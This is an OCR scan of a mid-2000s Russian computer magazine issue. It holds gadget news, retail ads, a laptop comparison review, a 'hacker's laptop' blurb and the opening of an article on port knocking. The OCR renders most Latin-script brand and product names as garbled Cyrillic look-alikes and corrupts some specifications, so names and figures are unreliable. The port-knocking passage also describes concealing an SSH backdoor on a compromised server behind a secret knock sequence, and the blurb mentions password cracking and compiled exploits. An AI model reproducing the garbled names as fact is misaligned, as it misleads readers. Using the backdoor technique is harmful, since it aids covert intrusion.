ния заметно упала в глазах своих поклонников и потенциальных покупа- 
телей, да и получила несколько пинков от компьютерных изданий. Как 
известно, формулу «покупатель всегда прав» пока никто не отменял, и 
спорить с этим как-то несуразно. 




НОВАЯ ЮЕА 
ОТ КЯАГТШАѴ 

Компания КгаКѵѵау объявляет о начале серийного производства новых, 
многофункциональных моделей домашних персональных компьютеров 
КгаКѵѵау Ібеа МС с предустановленной русифицированной операционной 
системой МісгозоШ ѴѴіпсІоѵѵз® ХР Мебіа Сепіег ЕсІШоп 2005. Как закон- 
ченное решение, КгаТСѵѵау Ібеа МС строится на базе мощных процессоров 
Іпіеі® Репііит® 4, имеет не менее 512 МБ оперативной памяти и жесткий 
диск от 160 ГБ, оснащается пишущим ОѴО-приводом и кардридером с 
поддержкой носителей 7 популярных форматов, современной видеокар- 
той ІМѴЮІА, ТВ-тюнером, поддерживающим российскую систему телеве- 
щания, пультом ДУ, беспроводной клавиатурой и мышью. В качестве 
средства отображения пользователь может использовать как монитор 
или телевизор, так и оба устройства сразу. Рекомендованная розничная 
цена на такую систему в стандартной комплектации составляет $1050. 




Встречайте — Кеуіоск 6600 — 
самый интеллектуальный в ми- 
ре дверной замок, который 
способен охранять вверенное 
ему помещение сразу несколь- 
кими способами. Естественно, 
у Кеуіоск 6600 осталось нес- 
колько сходств с обычным зам- 
ком, так, его можно открыть 
стандартным ключом или вос- 
пользоваться беспроводным 
брелком, но это все уже неак- 
туально. На самом деле перед- 
нюю панель замка можно 
сдвинуть вверх, а под ней кро- 
ются как раз самые интерес- 
ные фишки: сканер отпечатков 
пальцев и цифровая клавиату- 
ра (для ввода открывающего 
РІЫ-кода). Сканер способен за- 
помнить отпечатки семнадцати 
людей, которым разрешен дос- 
туп, а количество ложных сра- 
батываний, как обещают, не 
превышает одной десятиты- 
сячной процента. Электронные 
компоненты замка работают от 
батареек, и при необходимости 
их совсем не сложно заменить. 
Единственное не уточняется: 
чтобы попасть внутрь потребу- 
ется пройти сразу все процеду- 
ры идентификации или только одну? Внешне устройство выглядит весь- 
ма стильно, пожалуй, даже чересчур, что вызывает некоторые сомнения 
в его прочности, однако разработчики уверяют, что все изготовлено из 
высокопрочной стали, и замок получил все обязательные сертификаты, 
подтверждающие надежность. 



НІ-ТЕСН СОІ.Г 

Гольф — весьма приятная игра, даже 
претендующая на звание интеллекту- 
альной. Вот только не так просто в нее 
научится правильно играть. Особенно 
у новичков шарик обычно летит в лю- 
бом направлении, кроме того, которое 
замышлялось изначально. А, как ты 
знаешь, далеко не все поле такое ров- 
ное с травкой под 3 мм. По краям и 
трава высокая бывает, и кусты, и де- 
ревья, и водоемы и прочие препятс 
твия. И найти среди этого пейзажа 
запропастившийся мячик 

невозможно. Избавить начинающих 
любителей гольфа от подобных мук 
решилась компания ВасІагОоІІ, выпус- 
тив набор ВаІІ РозШопіпд Зузіет. В 
комплекте идет мешочек специальных шариков и радарное устройство. 
В каждый шарик встроен микроскопический чип, который видим рада- 
ром на расстоянии до 100 футов. На дисплее радара постоянно отобра- 
жается уровень сигнала, соответственно, чем он выше, тем ближе к те- 
бе находится мячик. Если ты хоть приблизительно заметил первона- 
чальное направление полета шарика, то найти его не составит практи- 
чески никакого труда. Кстати, мешочек, в котором хранятся мячики, то- 
же не простой: он не пропускает сигналы радара, чтобы тот срабатывал 
только на потерянный мячик. Заметим, шарики из комплекта были сер- 
тифицированы международной федерацией гольфа (ІІЗОА), так что с 
ними можно участвовать даже на официальных соревнованиях. 








Гарантия -2 года 
Бесплатная доставка по Москве 
Продажа в кредит 

Вся продукция сертифицирована 
(РОСС РУ. МЕ61.В01302) 



Благодаря высокопроизводительному 
Ехсііоп™ ІІпіѵегзаІ ЕБ61 на базе процессора 
Іпіеі® Репйит® 4 с технологией НТ 
Вы получите незабываемые 
впечатления от игр. 



Приобретайте компьютеры 
Эксилон™ в магазинах: 

ст. метро "Петровско- 
Разумовская", 

Дмитровкое шоссе, 107, оф. 235, 
(095) 485-5955, 485-5945; 

ст. метро "Савеловская", 

Сущевский вал, 5, 
тц "Савеловский", 
павильон 0 - 35 , (095) 784-6618; 

ст. метро "Шоссе Энтузиастов", 

Проспект Буденого, 53, 
"Буденновский компьютерный 
центр", 
павильон А-4 
(095) 788-1503; 

ст. метро "Шоссе Энтузиастов", 

Проспект Буденого, 53, 
"Буденновский компьютерный 
центр", 

павильон 1-18 (095) 788-1535. 

КОРПОРАТИВНЫЙ ОТДЕЛ: 

(095) 727-0231 
е-таіі: Ь2Ь@ехсіІап<±ги 
ѵѵѵѵѵѵ.ехсііапсі.ги 



и е-таіІ:іпІ г о@ехсіІапсІ.ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іп1Ъ@ехсіІапсІ.ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іпІ : о@ехсіІапсІ.ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іг 



ІпіеІ, ІпіеІ Іодо, ІпіеІ Іпзісіе, ІпіеІ Іпзісіе Іодо, Іпіеі Сепігіпо, ІпіеІ Сепігіпо Іодо, Сеіегоп, ІпіеІ Хеоп, ІпіеІ ЗреесІЗІер, Ііапіит апсі Репііит являются товарными знаками или зарегистрированными 
товарными знаками Іпіеі Согрогаііоп или ее отделений в США и других странах. 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ [РЕПНЫМ] НЬЮСЫ 



АСЕВ ТВАѴЕІ.МАТЕ 2350ХС ^ 

ВЕЫО ЛЭѴВООК 7000Ѳ10 
І_Ѳ І.ѴѴ60 

МЗІ МЕѲАВООК М425 
МЗІ МЕѲАВООК 3260 
ВОѴЕВВООК ЕХРЮВЕВ ѴѴ500ѴѴН 
ВОѴЕВ ѴОУАѲЕВ Е410 ѴѴН(В) 






[методика тестирования] 



МАЛ, ДА УДАЛ 

Ноутбук для работы и учебы 

Сергей Никитин ІезНаЬ (ІезПаЬ@датеІапсІ.ги) 



Рынок просто наводнили ноутбуки класса ЭТВ — за- 
мена домашнему ПК. От мобильных компьютеров в 
классической интерпретации в них осталось только 
форма и возможность автономной работы (не очень 
долгой, так как они на нее просто не рассчитаны). В 
остальном же эти громоздкие и неподъемные 
монстры являются отрицанием идеологии мобиль- 
ного компьютера, так как его можно взять с собой и 
работать с ним в дороге. Сегодня мы расскажем те- 
бе о том, как прошло тестирование настоящих поіе- 




Ьоокз — небольших ПК, которые всегда с тобой: на 
работе, в дороге и дома. Их возможности — по срав- 
нению с монструозными ЭТВ-машинами — выглядят 
более скромно, но это уже далеко не поІеЬоок! Это 
компактные устройства с довольно большими экра- 
нами, вес и габариты которых позволяют без проб- 
лем носить их с собой. Мощности их компонентов 
вполне хватит для мультимедийных развлечений и 
не самых «тяжелых» игр, а коммуникационные воз- 
можности пригодятся как в работе, так и в общении. 



В ноутбуки могут быть установлены два типа комплектующих: специализированные мобильные и обычные 
настольные устройства. Первые выделяют меньше тепла, потребляют меньше электроэнергии, могут очень 
экономично работать с аккумулятором (сбрасывая скорость. То есть они созданы специально для мобильных 
условий работы. Их минус — более медленная, по сравнению с настольными моделями, скорость работы. Но 
те комплектующие, которые конструировались для работы в обычных ПК, хоть и быстрее, но имеют большие 
размеры (следовательно, ноутбук будет иметь большие габариты), потребляют больше энергии и сильнее гре- 
ются, следовательно, мало приспособлены для тех условий работы, в которых существуют наши устройства. 
Да таких у нас сегодня практически и нет (это тебе просто для информации). 

Сегодня все изменяется очень быстро, так что нужно быть в курсе последних новостей. Для такой цели (да и для 
многих других) пригодится Интернет, в который можно выйти с помощью коммуникационных средств. Джентль- 
менский набор на данный момент — это модем, сетевая плата и адаптер ѴѴі-Рі. Если последний наличествует, то, 
скорее всего, твой ноутбук построен по технологии ІпіеІ Сепйіпо первого или второго поколения. Наклейка на но- 
утбуке, где фигурирует такое название, гарантирует, что там установлена мобильная версия процессора Репііит, 
адаптер ѴѴі-Рі, вторая версия прибавляет к этому восьмиканальный звуковой адаптер. К джентльменскому набо- 
ру связи (модем, І_АЫ, ѴѴі-Рі) может добавляться ИК-порт и адаптер ВІиеТооШ. Нужны ли они тебе, ты решишь 
сам, естественно, их можно приобрести и в виде отдельных устройств. Звуковой адаптер мы затрагивали выше 
(если это не Сепігіпо второго поколения, то, скорее всего, установлен шестиканальный кодек). Динамики в сис- 
темах стоят не очень высокого уровня. Да, можно поиграть, но не жди от них ничего особенного. Если ты обла- 
датель тонкого слуха, то тебе могут помочь хорошие наушники и вход для них, который есть на любом ноуте. На- 
верное, ЭѴЭ уже распространены достаточно, поэтому имеет смысл искать модели, оснащенные не комбиниро- 
ванными (ОѴЭ-РЮМ/СЭ-РІѴѴ), а универсальными приводами (ОѴО+/-ВѴѴ). Универсальность имеет свои градации: 
от устройств, работающих только с одним форматом (+ или -), до монстров, понимающих их оба, да еще и при- 
нимающих в свое нутро двухслойные диски. В некоторые ноутбуки встроен микрофон. Также отдельные модели 
могут работать в режиме мультимедиа-центра для развлечений, то есть проигрывать музыку без загрузки ОС. 
Обязательно обрати внимание на то, какие форматы карт понимает сагб-геабег. Если у тебя все фотики, плееры, 
сотовые телефоны и КПК работают с ЗЭ, а ридер в ноуте хочет только, например СотрасІЕІазИ, то это не очень 
удобно. После системных плат настольных ПК, оснащенных массой всевозможных портов и имеющих в комп- 
лекте поставки кучу планок, на которых этих портов еще больше, подобные возможности мобильных компьюте- 
ров некоторым могут показаться весьма аскетичными. Если тебе тоже так кажется, то ищи ноутбук, к которому 
можно подключить репликатор портов. Это дополнительное устройство, похожее на ежика или дикобраза, но 
только у тех во все стороны иглы торчат, а у этого — разъемы и порты. Ну а если тебе хватает пары портов ІІЗВ, 
то ты счастливый человек, который умеет довольствоваться минимально необходимым. 



Чтобы выяснить все, что касается этих устройств са- 
мым тщательным образом, мы разработали специ- 
альную методику тестирования, которая учитывает 
все нюансы работы мобильных компьютеров. Тесты 
проводились в двух режимах: при питании от сети и 
при автономной работе. С помощью утилиты І_аѵаІуз 
ЕѵегезІ мы получали подробнейшую информацию о 
системе. Потом, используя программы З&М (нагру- 
жает систему по полной) и ТгойІеѴѴаІсІі (логгирует 
частоту процессора, напряжение и прочие парамет- 
ры), мы выясняли правильность работы данного ПК 
по схемам питания аіѵѵауз оп (при работе от сети) и 
Іаріор (при работе от аккумулятора). Дело в том, что 
если при работе от сети все ноутбуки работают нор- 
мально, то некоторые, в режиме Іаріор, могут вести 
себя плохо: не снижать яркость экрана, не сбрасы- 



вать частоту работы и напряжения процессора, что 
негативно отражается на времени работы, а резуль- 
таты тестов получаются некорректными. В том слу- 
чае, если все было нормально, то запускался тесто- 
вый комплект: утилиты ЗЭМагк 2001 ЗЕ, ЗЭМагк 
2003, ЗЭМагк 2005, РСМагк 2004 и РСМагк 2005. Тут 
стоит отметить, что пятые версии тестов ЗЭМагк и 
РСМагк не запустились на многих ноутбуках. Дело 
тут в том, что эти машины оснащены встроенными 
видеоадаптерами, которые просто-напросто не под- 
держивают те новомодные графические функции, 
которые нужны для работы этих программ. Понятно, 
что эти ПК ориентированы на офисные приложения. 
К утилитам от РиШгеМагк добавлялась программа 
Вайегу Еаіег, при помощи которой мы определяли 
время автономной работы устройства. 
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іѳзі_ІаЬ выражает благодарность за предоставленное на тестирование оборудование компании — РОѴЕР (\ллллл/.гоѵегЬоок.ги), 
также российским представительствам компаний Азиз, МЗІ, І_Ѳ, ВепО, Асег. 
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ВегЮ 

«ІоуВоок 

7000С10 


Асег 

ТгаѵеІМаіе 

2350ХС 


Коѵег 
Ѵоуадег 
Е410 ѴѴН(В) 

Технические характеристики: 


Технические характеристики: 


Технические характеристики: 


Процессор, ГГц: 1,6, Іпіеі Репііит М 725 


Процессор, ГГц: 1,4, Іпіеі Сеіегоп М 360 


Процессор, ГГц: 1,7, Іпіеі Репііит М 735 


Память, Мб: 512 


Память, Мб: 256 


Память, Мб: 512 


Размер экрана, дм: 14 


Размер экрана, дм: 14 


Размер экрана, дм: 14 


Видеоплата, Мб: 64, АТІ МоЫІИу Вабеоп 9700 


Видеоплата, Мб: 64, Іпіеі Ехігете Сгарііісз 2 


Видеоплата, Мб: ЗіЗ 661 РХ 


Жесткий диск, Гб: 60 


Жесткий диск, Гб: 40 


Жесткий диск, Гб: 60 


Оптический привод: ОѴО+ВѴѴ 


Оптический привод: ОѴО-РЮМ/СО-РІѴѴ 


Оптический привод: ОѴО-РЮМ/СО-РІѴѴ 


Средства связи: модем, І_АІ\І, ѴѴі-Рі 


Средства связи: модем, І_АІЧ 


Средства связи: модем, І_АІ\І 


Интерфейсы: ЫЗВ, РСМСІА, РігеѴѴіге, З-Ѵісіео, ѴСА 


Интерфейсы: УЗВ, РСМСІА, ѴСА 


Интерфейсы: 115В, ѴСА, І_РТ, СОМ, Р5\2 


Габариты, мм: 341x243x33 


Габариты, мм: 336x281 х 35 


Габариты, мм: 315x255x39 


Вес, кг: 2 


Вес, кг: 2, 84 


Вес, кг: 2,4 


$1500 


$900 


$885 


★★★★★ 


★ ★★ 


★ ★★ 



Небольшой ноутбук с широкоформатным экраном, 
на котором будет очень удобно смотреть фильмы. 
Весит мало, так что смело можно возить с собой, 
тем более что время автономной работы у него дос- 
таточно велико. Судя по тем результатам тестов, ко- 
торые он показал, с большинством деловых и муль- 
тимедийных приложений он справится без проблем, 
его комплектующие вполне на это способны. Внеш- 
ний вид у него классический, так же как и то, что ты 
увидишь, открыв крышку, — ІоисІірасІ с двумя клави- 
шами, индикаторы, несколько «быстрых» кнопок. Из 
особенностей можно отметить встроенный микро- 
фон, неплохой набор ПО, а также пульт дистанцион- 
ного управления в комплекте поставки. Его трудно 
потерять, так как он хранится в слоте РСМСІА. А ес- 
ли этот слот занят, то небольшие размеры пульта 
позволят носить его даже в кармане рубашки. 
Довольно слабая видеоплата делает невозмож- 
ным запуск серьезных игр. Рассчитывай на не 
очень новые и графически навороченные игруш- 
ки. Отсутствие адаптера ВІиеІооІН может ослож- 
нить связь ноутбука с различными устройствами. 



Очень доступная по цене модель, с базовым набо- 
ром функций. Отлично подойдет тем, кто приобре- 
тает ноутбук исключительно для работы. Конечно, 
на нем можно и фильм посмотреть, и музыку пос- 
лушать никто не мешает, но все-таки больше все- 
го он подходит для выполнения офисных приложе- 
ний. Его 14-дюймового экрана (не широкоформат- 
ного) для них вполне хватит, так же как и станда- 
ртной клавиатуры и ІоисН расГа. В комплект пос- 
тавки входит весь необходимый системный софт, 
а габариты ноутбука и приличное время автоном- 
ной работы позволяют использовать его в дороге. 
К сожалению, ценовая доступность объясняется 
скудностью конфигурации. Встроенный видеоа- 
даптер, минимум ОЗУ, простой (0\Ю только чита- 
ет, СО пишет) оптический привод, мобильный 
процессор Сеіегоп. Именно встроенной графике 
Асег ТгаѵеІМаІе 2350ХС обязан столь низким ре- 
зультатам в тестах и тому, что приложения пятой 
серии (ЗйМагк и РСМагк 2005) отказались запус- 
каться. В общем, это недорогая рабочая лошадка 
начального уровня. 



Еще один очень доступный ноутбук, участвующий в 
сегодняшнем тестировании. Он отлично подойдет че- 
ловеку, приобретающему мобильный ПК для работы, 
а не для легкомысленного времяпрепровождения за 
играми. Его общая производительность довольно вы- 
сока, выше, чем у изделия Асег, также недорогого. 
Вообще, основные компоненты у него неплохие: про- 
цессор, память и жесткий диск вполне на уровне. 
Имеется базовый набор интерфейсов, а также сред- 
ства связи. Габариты и вес невелики, так что с собой 
можно его таскать безо всяких проблем. В комплект 
поставки входит набор программного обеспечения. 
Крайне слабая встроенная видеоплата, которой 
из оперативной выделяется только 32 Мб памяти, 
из графических тестов позволила запустить толь- 
ко ЗОМагк 2001 . То есть о любых современных иг- 
рах, скорее всего, придется забыть. Нет никаких 
беспроводных коммуникационных средств, нет 
возможности записывать ОѴО-диски, зато есть 
классические коммуникационные порты. Если вы 
хотите ноутбук для работы, а не для развлечений, 
то этот ПК подходит вам идеально. 






І.С І.ѴѴ60 *вне конкурса 

Технические характеристики: 

Процессор, ГГц: 1,6, Іпіеі Репііит М 730 

Память, Мб: 512 

Размер экрана, дм: 15,4 

Видеоплата, Мб: 128, АН МоЫИІу Васіеоп Х600 

Жесткий диск, Гб: 60 

Оптический привод: РѴР+ВѴѴ 

Средства связи: модем, І_АІМ, ІВ, ѴѴі-Ві 

Интерфейсы: 11813, РігеѴѴіге, ѴОА, З-Ѵісіео, І_РТ, РС СагсІ, 
ЩрІІІз' СагсІ^ "* 

Габариты, мм: 3354x264x30,6 

Вес, кг: 2,9 

$ 1700 



Множество дополнительных клавиш и индикато- 
ров, которые находятся под крышкой этого ноут- 
бука, сразу настраивают на деловой лад. Пост- 
роенный на технологии ІпіеІ Сепігіпо второго по- 
коления (Золота), он имеет процессор Репііит 
М с тактовой частотой 1,6 ГГц, графический 
адаптер АТІ МоЬіІіІу Пасіеоп Х600, оснащенный 
128 Мб собственной памяти, а также 512 Мб 
быстрого ОЗУ типа ООП2. Работая совместно, 
все эти компоненты показали очень хорошие ре- 
зультаты в тестах на производительность и вре- 
мя автономной работы. Помимо дополнительных 
клавиш, удобство работы повышает пульт ДУ из 
комплекта поставки. Средства связи представ- 
лены хорошим набором: модем, сетевая плата, 
инфракрасный порт и адаптер ѴѴі-Рі. В прилагае- 
мый комплект ПО входит утилита І_Ѳ Іпіеііідепі 
ІІрсІаіе, с помощью которой можно легко и быст- 
ро обновить все установленное программное 
обеспечение и драйвера, а также установить 
исправления для них. 

В автономном режиме со схемой питания Іаріор, 
І_Ѳ І.ѴѴ60 значительно сбрасывает производи- 
тельность, благодаря чему дольше всех работа- 
ет от батареи. Цена гораздо выше, нежели стои- 
мость остальных участников. 



МЗІ 

МедаЬоок 

8425 

Технические характеристики: 

Процессор, ГГц: 1,6, Іпіеі Репііит М 730 

Память, Мб: 512 

Размер экрана, дм: 14 

Видеоплата, Мб: 128, ОеГогсе Оо 6200 

Жесткий диск, Гб: 60 

Оптический привод: РѴР+ВѴѴ РІ_ 

Средства связи: модем, І_АІЧ, ВІііеІооЦі, ѴѴі-Гі 

Интерфейсы: ЦЗВ, УСА, 5-ѴісІео, ГігеѴѴіге, РСМСІА 

Габариты, мм: 335x205x30 

Вес, кг: 2 

$ 1470 

★ ★★★ 



Это уже абсолютно полноценный ноутбук, в котором 
есть все необходимое не только для работы, но и для 
развлечений. В отличие от трех предыдущих участ- 
ников, он прошел довольно успешно все тесты. У не- 
го имеются хорошие полноценные (а не встроенные) 
компоненты, например, видеоплата со 128 Мб 
собственной (а не выделяемой из оперативной) па- 
мяти. Также наличествуют все средства связи, осо- 
бенно радуют беспроводные ВІиеІооІН и ѴѴі-Рі. Экран 
широкоформатный, что оценят любители видео. 
Мощный оптический привод, работающий с двухс- 
лойными дисками ОѴО, а также носителями стан- 
дарта +, повышает котировки всего ноутбука. Вес и 
габариты вполне удовлетворительны, так что при 
переноске проблем возникнуть не должно. Имеется 
также и кардридер, понимающий шесть типов карт. 
В общем, неплохая универсальная машина, которая 
в дороге обеспечит и работу, и развлечения. 
Отсутствует инфракрасный порт. Производитель- 
ность далеко не самая высокая. Очень яркий ин- 
дикатор питания будет резать глаза при работе в 
темноте. 



М8І 

МедаВоок 

8260 

Технические характеристики: 

Процессор, ГГц: 1,6, Іпіеі Репііит М 725 

Память, Мб: 256 

Размер экрана, дм: 12,1 

Видеоплата, Мб: МоЫІе Іпіеі 915 ОМ 

Жесткий диск, Гб: 40 

Оптический привод: РѴР-ВОМ\СР-ВѴѴ 

Средства связи: модем, І_АІЧ, ѴѴі-Гі 

Интерфейсы: ЦЗВ, тіпі-ГігеѴѴіге, тіс, Ііеасізеі, РС СагсІ і 

Габариты, мм: 330x225x27 |Ч 

Вес, кг: 1 ,8 М 

$1150 °, 

*** I 



Самый маленький участник нашего тестирова- 
ния. Его габариты и вес делают его идеальным 
помощником в дальней дороге, так как много 
места он уж точно не займет. Необычно, что кла- 
виатура выкрашена в белый цвет. Мощности 
компонентов (процессор Іпіеі Репііит М 1,6 ГГц, 
256 Мб оперативной памяти, встроенный графи- 
ческий адаптер, жесткий диск емкостью 40 Гб) с 
лихвой хватит для выполнения любой офисной 
задачи. А адаптер ѴѴі-Рі, поддерживающий пос- 
ледний стандарт - д -, пригодится и для работы, 
и для развлечения. При работе от батареи ско- 
рость выполнения тестовых приложений практи- 
чески не изменялась. Также к приятным момен- 
там можно отнести наличие кардридера, слотов 
РігеѴѴіге и РС СагсІ и наличие в комплекте пос- 
тавки салфеток для протирки дисплея. Нагрев 
при работе не очень сильный. 

Этот ноут отличает не самая высокая производи- 
тельность. Встроенный графический адаптер не 
имеет собственной памяти. Не очень большое вре- 
мя автономной работы. 
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НОУТБУК 

ХАКЕРА 



$1200 



А5У5 5200Ы 




МАЛЕНЬКИЙ РАЗМЕР 



ПРОИЗВОДИТЕЛЬНОСТЬ ѴѴі-Рі 



ЫЗР рекомендует 
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У ноутбука крайне маленький 
размер. Он один из самых не- 
больших лаптопов на всем рын- 
ке ноутбуков. Его габариты — 
225x152x26.5. И весит он мень- 
ше килограмма. Его ближай- 
ший конкурент Золу ѴАЮ ѴОЫ- 
Т2ХВР/3 имеет габариты 
272x205x34. С такими размера- 
ми этот ноутбук можно без 
проблем носить в сумке и при 
необходимости в любой момент 
им воспользоваться. 



В Азиз з200п работает на осно- 
ве центриновского процессора 
Іпіеі Репііит-М 1000 М 62 . Одно- 
го гигагерца тебе хватит не 
только на отладку какой-ни- 
будь программы, но и на рас- 
шифровку паролей тем же Зоііп 
ІПе Віррег’ом, не говоря уже о 
просмотре фильмов. А благо- 
даря технологии сепігіпо бата- 
рейка протянет большее коли- 
чество времени. Итог: ноут 
действительно шустренький. 



На борту з200п стоит ѴѴі-Рі чип- 
сет с поддержкой 802.1 1 Ь. Ес- 
ли тебе вдруг попадется какое- 
нибудь заведение с беплатным 
ѴѴі-Рі, то ты сможешь спокойно 
заниматься своими делами, 
попивая чаек или кофе. N30, 
например, любит заскочить в 
Ргібауз и начать сливать длин- 
ные видеофильмы. Минус ноут- 
бука — скорость канала (всего 
11 мегабит), так как это еще 
802.116, а не 802.1 1д. 



N30 уже давно пользуется 
3200п. И протестировал его уже 
по полной программе: неоднок- 
ратно ронял на пол, стучал по 
нему, однажды даже хотел уда- 
рить об стену. Тогда у него не 
работала его программа. 3200п 
все выдержал. 

А сколько N30 на нем проделал 
своих грязных делишек! Куча 
скомпиленных сплоитов, непонят- 
ный трафик. В общем, если ты ха- 
кер, то Азиз з200п — твой выбор :). 
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У настоящих девушек 
нет клавиатуры и дисплея, 
работа с ними и отслеживание 
их состояния весьма 
затруднены. Пользуйся 




РОК МЕЫ 



и она зависнет рядом с тобой! 



Зопу 05С-Т7 




Медведь с пультом 




Флешка, показывающая 
объем памяти 




Гель ДЛЯ брИТѢЯ 



Супер наборы для 
молодых и успешных 
мужчин: Гель для бритья и 
Бодрящая пенка после бритья 
с хрустящим эффектом. 

Гель обеспечивает мягкое и 
гладкое бритье, увлажняя 
и питая кожу витаминами. 

А пенка, при нанесении 
на кожу, весело хрустит, 
создавая бодрое 
утреннее настроение! 
Бриться можно весело! 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ [РС_2<ЖЕ] РЕВВІІМ НЬЮСЫ 



Тук-тук, 
это я! 



Роіі Кпоскіпд. 

Новый фокус от админов в действии 



СКАНИРОВАНИЕ ПОРТОВ — ИЗЛЮБЛЕННЫЙ ПРИЕМ 
СЕТЕВЫХ ВЗЛОМЩИКОВ. С ЕГО ПОМОЩЬЮ МОЖНО 
ЛЕГКО ОПРЕДЕЛИТЬ АКТИВНЫЕ СЕРВИСЫ, ВЫЯС- 
НИТЬ НАЗВАНИЯ И ВЕРСИИ ИСПОЛЬЗУЕМОГО СОФ- 
ТА, ПОСЛЕ ЧЕГО ПОПЫТАТЬСЯ НАЙТИ ПОДХОДЯ- 
ЩИЙ ЭКСПЛОЙТ. ИНОГДА СКАНЕР ПОРТОВ ПОКА- 
ЗЫВАЕТ ФИГУ И ГОВОРИТ, ЧТО НА УДАЛЕННОЙ 
МАШИНЕ ОТКРЫТЫХ ПОРТОВ НЕТ. КОНЕЧНО, РАБО- 
ТАЮЩИХ СЕРВИСОВ МОЖЕТ ДЕЙСТВИТЕЛЬНО НЕ 
БЫТЬ, НО ВОЗМОЖЕН И ДРУГОЙ ВАРИАНТ — АДМИ- 
НИСТРАТОР ИСПОЛЬЗУЕТ ПРИЕМ РОВТ КІМОСКІЫО 

I Степан Ильин ака 51ер (5Іер@датеІапсІ.ги) 






[порт — что?] «Порт нокинг» — это особая технология передачи 
данных. Для того чтобы лучше ее понять, вспомни азбуку Морзе и 
конкретно обозначение слова 505. Сигнал бедствия передается с 
помощью комбинации — три точки, три тире, три точки. Три точки, 
соответственно, обозначает букву 5, а три тире — букву О. Для всех 
остальных символов также существуют аналогичные обозначения. 
Таким образом, общий принцип очень прост: с помощью последова- 
тельностей точек и тире можно представить любую букву, а соотве- 
тственно, слово и текст. Технология Рог! Кпоскіпд использует очень 
схожий принцип. Разница лишь в том, что для кодирования инфор- 
мации применяются не точки и тире, а серии попыток подключения 
к закрытым портам. Зачем это нужно? Для многого. 

Возьму сразу распространенный и банальный пример. Если клиенту за- 
ранее известна секретная последовательность подключений, то он мо- 
жет подключиться даже к тому серверу, у которого открытые порты 
внешне отсутствуют. Скажем, если бы я хотел приконнектиться к взло- 
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манному серверу через 53Н, то сконструировал такой бэкдор, который не 
использует напрямую 22 или любой другой порт. Такой подход сразу же вы- 
зовет подозрения у любого опытного администратора. Лучше сделать так, 
чтобы бэкдор определял попытки подключения последовательно на 1011, 
1007, 1033, 1002, 1000 порты, после чего открывал доступ к ЗЗН-порту на 
несколько секунд. Этих секунд будет вполне достаточно, чтобы подключить- 
ся и комфортно работать в системе. 

Последовательность попыток подключения к закрытым портам называется 
Кпоск («тук-тук!»). Несмотря на то, что все порты на сервере закрыты, все 
попытки непрерывно отслеживаются, и информация о них записываются в 
логи файрвола. Сервер чаще всего никак не отвечает на эти подключения, 
но он считывает и обрабатывает их. Если серия подключений обозначена в 
настройках специального Рогі Кпоск демона, на сервере тут же выполнится 
определенное действие. В большинстве случаев открываются несколько 
портов, например 22, — для возможности подключения администратора к 
ЗЗН-сервису. Но это лишь один из вариантов. Триггер может совершенно 
по-разному реагировать на правильный «тук-тук!» и не только динамически 
изменять правила файрвола, а еще выполнять любые другие администра- 
тивные действия (скажем, выполнять перезагрузку системы, отключение пи- 
тания и т.п.). Что касается выбора Кпоск'ов, то он произволен и зависит иск- 
лючительно от разработчика. Единственное условие — последовательность 
подключений (или алгоритм ее составления) должна быть заранее известна 
как для серверной, так и клиентской стороны. 

[4 шага к счастью] Теперь, когда ты представляешь суть технологии, 
предлагаю рассмотреть ее изнутри (см. схему выше). Условно работу Рогі 
Кпоскіпд можно разделить на 4 шага, которые обозначены на следующих 
рисунках. Серый треугольник представляет собой сервер, симпатичные 
квадратики символизируют конкретные порты, а пунктирные линии — клие- 
нтские подключения. 

Первый шаг. На сервере работает файрвол, который блокирует подключе- 
ние к любым портам. Клиент А пытается подключить к Ы-ому порту, но бе- 
зуспешно. Та же беда и у клиента В. 

Второй шаг. Клиент в заранее известном порядке пытается подключиться к 
портам 1 ,2,3,4. В этой последовательности соединений зашифровано специ- 
альное сообщение, которое заранее известно серверу. Клиент знает, что 
после серии попыток подключения, на серверной стороне будет выполнено 
определенное действие, однако в процессе соединения он не получает от 
нее каких-либо ответов. Это происходит, потому что в правилах файрвола 
запрещено реагировать на какие-либо попытки подключения. 

Третий шаг. В странном поведении клиента (беспорядочных подключениях 
к различным портам), подробно описанном в логах файрвола, демон Рогі 
Кпоскіпд распознал сообщение («тук-тук!») и интерпретировал его. В дан- 
ном случае он открыл Ы-ый порт для клиента. 

Четвертый шаг. Выдержав паузу, чтобы сервер успел среагировать на 
Кпоск-сообщение, клиент еще раз попытался подключиться к порту N. И, о 
чудо! Несмотря на то, что порт еще совсем недавно был закрыт, подключе- 
ние прошло успешно! 

[вдаемся в детали] Как ты мог заметить, одну из ключевых ролей в ме- 
ханизме Рогі Кпоскіпд играет файрвол. В случае ипіх-реализаций демон Рогі 
Кпоскіпд представляет собой лишь продвинутый анализатор логов. От него 
требуется лишь непрерывно отслеживать изменения в логах файрвола, что- 
бы распознать в клиентских подключениях Кпоск-сообщения. Файрвол пол- 
ностью берет на себя обработку сетевых пакетов, поэтому нужно хотя бы в 
общих чертах представлять механизмы работы брандмауэра и установки 



сетевого подключения в целом. 

Вообще, процесс соединения по ТСР-протоколу проходит в 3 этапа: 

Ш Клиент посылает пакет серверу со специальным флагом, который назы- 
вается ЗѴЫ РІад. Наличие такого флага указывает, что клиент хочет устано- 
вить соединение. 

\2\ В ответ на запрос клиента сервер посылает пакет, содержащий тот же са- 
мый флаг ЗУЫ и флаг АСК, обозначающий, что сервер принял запрос о со- 
единении и ждет от клиента подтверждения для его установления. 

[з] После получения пакета с ЗУЫ- и АСК-флагами клиент посылает серве- 
ру пакет, содержащий только флаг АСК. Это означает, что соединение уста- 
новлено успешно. 

Если на сервере установлен файрвол, то второй пункт немного видоизменя- 
ется. Как только брандмауэр получает от клиента пакет с ЗУЫ-флагом, он 
начинает обрабатывать его. Для этого он считывает параметры пакета и 
сверяет со своими правилами, после чего выносит вердикт. Если ни одно из 
правил не разрешает прием данного пакета, пакет отвергается, а соедине- 
ние разрывается или отбрасывается. Почему «или»? Это тонкий момент: от- 
ветная реакция файрвола зависит от его настроек. 

Рассмотрим это на примере линуксового ірсИаіпз, поскольку он наиболее прост 
для понимания. Данный брандмауэр может либо принять (АССЕРТ), либо откло- 
